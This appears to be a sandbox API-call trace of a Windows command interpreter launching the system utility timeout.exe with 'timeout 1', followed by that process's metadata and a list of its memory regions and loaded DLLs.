[0372.775] _wcsicmp (_String1="timeout", _String2="TIME") returned 111
[0372.775] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4
[0372.775] _wcsicmp (_String1="timeout", _String2="MD") returned 7
[0372.775] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7
[0372.775] _wcsicmp (_String1="timeout", _String2="RD") returned 2
[0372.775] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2
[0372.776] _wcsicmp (_String1="timeout", _String2="PATH") returned 4
[0372.776] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13
[0372.776] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1
[0372.776] _wcsicmp (_String1="timeout", _String2="CLS") returned 17
[0372.776] _wcsicmp (_String1="timeout", _String2="CALL") returned 17
[0372.776] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2
[0372.776] _wcsicmp (_String1="timeout", _String2="VER") returned -2
[0372.776] _wcsicmp (_String1="timeout", _String2="VOL") returned -2
[0372.776] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15
[0372.776] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1
[0372.776] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15
[0372.776] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7
[0372.776] _wcsicmp (_String1="timeout", _String2="START") returned 1
[0372.776] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16
[0372.777] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9
[0372.777] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7
[0372.777] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4
[0372.777] _wcsicmp (_String1="timeout", _String2="POPD") returned 4
[0372.777] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19
[0372.777] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14
[0372.777] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18
[0372.777] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17
[0372.777] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7
[0372.777] _wcsicmp (_String1="timeout", _String2="DIR") returned 16
[0372.777] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15
[0372.777] _wcsicmp (_String1="timeout", _String2="DEL") returned 16
[0372.777] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16
[0372.777] _wcsicmp (_String1="timeout", _String2="COPY") returned 17
[0372.778] _wcsicmp (_String1="timeout", _String2="CD") returned 17
[0372.778] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17
[0372.778] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2
[0372.778] _wcsicmp (_String1="timeout", _String2="REN") returned 2
[0372.778] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15
[0372.778] _wcsicmp (_String1="timeout", _String2="SET") returned 1
[0372.778] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4
[0372.778] _wcsicmp (_String1="timeout", _String2="DATE") returned 16
[0372.778] _wcsicmp (_String1="timeout", _String2="TIME") returned 111
[0372.778] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4
[0372.778] _wcsicmp (_String1="timeout", _String2="MD") returned 7
[0372.778] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7
[0372.778] _wcsicmp (_String1="timeout", _String2="RD") returned 2
[0372.778] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2
[0372.779] _wcsicmp (_String1="timeout", _String2="PATH") returned 4
[0372.779] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13
[0372.779] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1
[0372.779] _wcsicmp (_String1="timeout", _String2="CLS") returned 17
[0372.779] _wcsicmp (_String1="timeout", _String2="CALL") returned 17
[0372.779] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2
[0372.779] _wcsicmp (_String1="timeout", _String2="VER") returned -2
[0372.779] _wcsicmp (_String1="timeout", _String2="VOL") returned -2
[0372.779] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15
[0372.779] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1
[0372.779] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15
[0372.779] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7
[0372.779] _wcsicmp (_String1="timeout", _String2="START") returned 1
[0372.779] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16
[0372.779] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9
[0372.779] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7
[0372.779] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4
[0372.780] _wcsicmp (_String1="timeout", _String2="POPD") returned 4
[0372.780] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19
[0372.780] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14
[0372.780] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18
[0372.780] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17
[0372.780] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7
[0372.780] _wcsicmp (_String1="timeout", _String2="FOR") returned 14
[0372.780] _wcsicmp (_String1="timeout", _String2="IF") returned 11
[0372.780] _wcsicmp (_String1="timeout", _String2="REM") returned 2
[0372.781] GetProcessHeap () returned 0x70000
[0372.781] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x218) returned 0x8af20
[0372.781] GetProcessHeap () returned 0x70000
[0372.781] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x26) returned 0x847e0
[0372.781] _wcsnicmp (_String1="time", _String2="cmd ", _MaxCount=0x4) returned 17
[0372.782] GetProcessHeap () returned 0x70000
[0372.782] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x420) returned 0x8b140
[0372.782] SetErrorMode (uMode=0x0) returned 0x8001
[0372.782] SetErrorMode (uMode=0x1) returned 0x0
[0372.782] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8b150, lpFilePart=0x2af1a0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2af1a0*="system32") returned 0x13
[0372.783] SetErrorMode (uMode=0x8001) returned 0x1
[0372.783] GetProcessHeap () returned 0x70000
[0372.783] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x8b140, Size=0x48) returned 0x8b140
[0372.783] GetProcessHeap () returned 0x70000
[0372.783] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x8b140) returned 0x48
[0372.783] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0372.783] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0372.784] GetProcessHeap () returned 0x70000
[0372.784] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x1ce) returned 0x8b1a0
[0372.784] GetProcessHeap () returned 0x70000
[0372.784] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x38c) returned 0x8b380
[0372.797] GetProcessHeap () returned 0x70000
[0372.797] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x8b380, Size=0x1d0) returned 0x8b380
[0372.797] GetProcessHeap () returned 0x70000
[0372.797] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x8b380) returned 0x1d0
[0372.797] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0372.797] GetProcessHeap () returned 0x70000
[0372.797] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xe8) returned 0x71d50
[0372.797] GetProcessHeap () returned 0x70000
[0372.797] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x71d50, Size=0x7e) returned 0x71d50
[0372.798] GetProcessHeap () returned 0x70000
[0372.798] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x71d50) returned 0x7e
[0372.798] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0372.798] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.*" (normalized: "c:\\windows\\system32\\timeout.*"), fInfoLevelId=0x1, lpFindFileData=0x2aef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef10) returned 0x71a80
[0372.798] GetProcessHeap () returned 0x70000
[0372.798] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x847b0, Size=0x8) returned 0x88630
[0372.798] FindClose (in: hFindFile=0x71a80 | out: hFindFile=0x71a80) returned 1
[0372.799] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.COM" (normalized: "c:\\windows\\system32\\timeout.com"), fInfoLevelId=0x1, lpFindFileData=0x2aef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef10) returned 0xffffffffffffffff
[0372.799] GetLastError () returned 0x2
[0372.799] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.EXE" (normalized: "c:\\windows\\system32\\timeout.exe"), fInfoLevelId=0x1, lpFindFileData=0x2aef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef10) returned 0x71a80
[0372.799] FindClose (in: hFindFile=0x71a80 | out: hFindFile=0x71a80) returned 1
[0372.800] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0372.800] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0372.800] GetConsoleTitleW (in: lpConsoleTitle=0x2af460, nSize=0x104 | out: lpConsoleTitle="taskeng.exe") returned 0xb
[0372.800] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af218, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af1d8 | out: lpAttributeList=0x2af218, lpSize=0x2af1d8) returned 1
[0372.800] UpdateProcThreadAttribute (in: lpAttributeList=0x2af218, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af1c8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af218, lpPreviousValue=0x0) returned 1
[0372.800] GetStartupInfoW (in: lpStartupInfo=0x2af330 | out: lpStartupInfo=0x2af330*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0372.801] GetProcessHeap () returned 0x70000
[0372.801] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x847b0
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.804] GetProcessHeap () returned 0x70000
[0372.804] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x847b0 | out: hHeap=0x70000) returned 1
[0372.804] GetProcessHeap () returned 0x70000
[0372.804] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x12) returned 0x88650
[0372.804] lstrcmpW (lpString1="\\timeout.exe", lpString2="\\XCOPY.EXE") returned -1
[0372.808] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\timeout.exe", lpCommandLine="timeout 1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2af250*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="timeout 1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af200 | out: lpCommandLine="timeout 1", lpProcessInformation=0x2af200*(hProcess=0x58, hThread=0x54, dwProcessId=0xc10, dwThreadId=0xc0c)) returned 1
[0372.851] CloseHandle (hObject=0x54) returned 1
[0372.852] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0372.852] GetProcessHeap () returned 0x70000
[0372.852] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8baa0 | out: hHeap=0x70000) returned 1
[0372.852] GetEnvironmentStringsW () returned 0x8b940*
[0372.852] GetProcessHeap () returned 0x70000
[0372.852] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb78) returned 0x8c4c0
[0372.852] memcpy (in: _Dst=0x8c4c0, _Src=0x8b940, _Size=0xb78 | out: _Dst=0x8c4c0) returned 0x8c4c0
[0372.853] FreeEnvironmentStringsW (penv=0x8b940) returned 1
[0372.853] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0
[0373.777] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x2af148 | out: lpExitCode=0x2af148*=0x0) returned 1
[0373.777] CloseHandle (hObject=0x58) returned 1
[0373.777] _vsnwprintf (in: _Buffer=0x2af3b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af158 | out: _Buffer="00000000") returned 8
[0373.778] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0373.778] GetProcessHeap () returned 0x70000
[0373.778] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8c4c0 | out: hHeap=0x70000) returned 1
[0373.778] GetEnvironmentStringsW () returned 0x8b940*
[0373.779] GetProcessHeap () returned 0x70000
[0373.779] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb9e) returned 0x8dbf0
[0373.779] memcpy (in: _Dst=0x8dbf0, _Src=0x8b940, _Size=0xb9e | out: _Dst=0x8dbf0) returned 0x8dbf0
[0373.779] FreeEnvironmentStringsW (penv=0x8b940) returned 1
[0373.779] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0373.779] GetProcessHeap () returned 0x70000
[0373.779] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8dbf0 | out: hHeap=0x70000) returned 1
[0373.779] GetEnvironmentStringsW () returned 0x8b940*
[0373.780] GetProcessHeap () returned 0x70000
[0373.780] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb9e) returned 0x8dbf0
[0373.780] memcpy (in: _Dst=0x8dbf0, _Src=0x8b940, _Size=0xb9e | out: _Dst=0x8dbf0) returned 0x8dbf0
[0373.780] FreeEnvironmentStringsW (penv=0x8b940) returned 1
[0373.780] GetProcessHeap () returned 0x70000
[0373.780] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x88650 | out: hHeap=0x70000) returned 1
[0373.780] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af218 | out: lpAttributeList=0x2af218)
[0373.780] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.780] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0373.781] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.781] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0373.782] _get_osfhandle (_FileHandle=0) returned 0x3
[0373.782] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0373.783] _get_osfhandle (_FileHandle=0) returned 0x3
[0373.783] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
[0373.783] SetConsoleInputExeNameW () returned 0x1
[0373.783] GetConsoleOutputCP () returned 0x1b5
[0373.784] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0373.784] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0373.784] exit (_Code=0)
Process:
id = "7"
image_name = "timeout.exe"
filename = "c:\\windows\\system32\\timeout.exe"
page_root = "0x1fad1000"
os_pid = "0xc10"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xb48"
cmd_line = "timeout 1"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1593
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1594
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1595
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1596
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1597
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1598
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1599
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1600
start_va = 0xff740000
end_va = 0xff74bfff
monitored = 1
entry_point = 0xff746830
region_type = mapped_file
name = "timeout.exe"
filename = "\\Windows\\System32\\timeout.exe" (normalized: "c:\\windows\\system32\\timeout.exe")
Region:
id = 1601
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1602
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1603
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1604
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1605
start_va = 0x250000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1606
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1607
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1608
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1609
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1610
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1611
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1612
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1613
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1614
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1615
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1616
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1617
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1618
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1619
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1620
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1621
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1622
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1623
start_va = 0xc0000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1624
start_va = 0x250000
end_va = 0x34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1625
start_va = 0x410000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 1626
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1627
start_va = 0x130000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 1628
start_va = 0x510000
end_va = 0x697fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 1629
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1630
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1631
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1632
start_va = 0x6a0000
end_va = 0x820fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006a0000"
filename = ""
Region:
id = 1633
start_va = 0x830000
end_va = 0x1c2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000830000"
filename = ""
Region:
id = 1634
start_va = 0xc0000
end_va = 0xc1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "timeout.exe.mui"
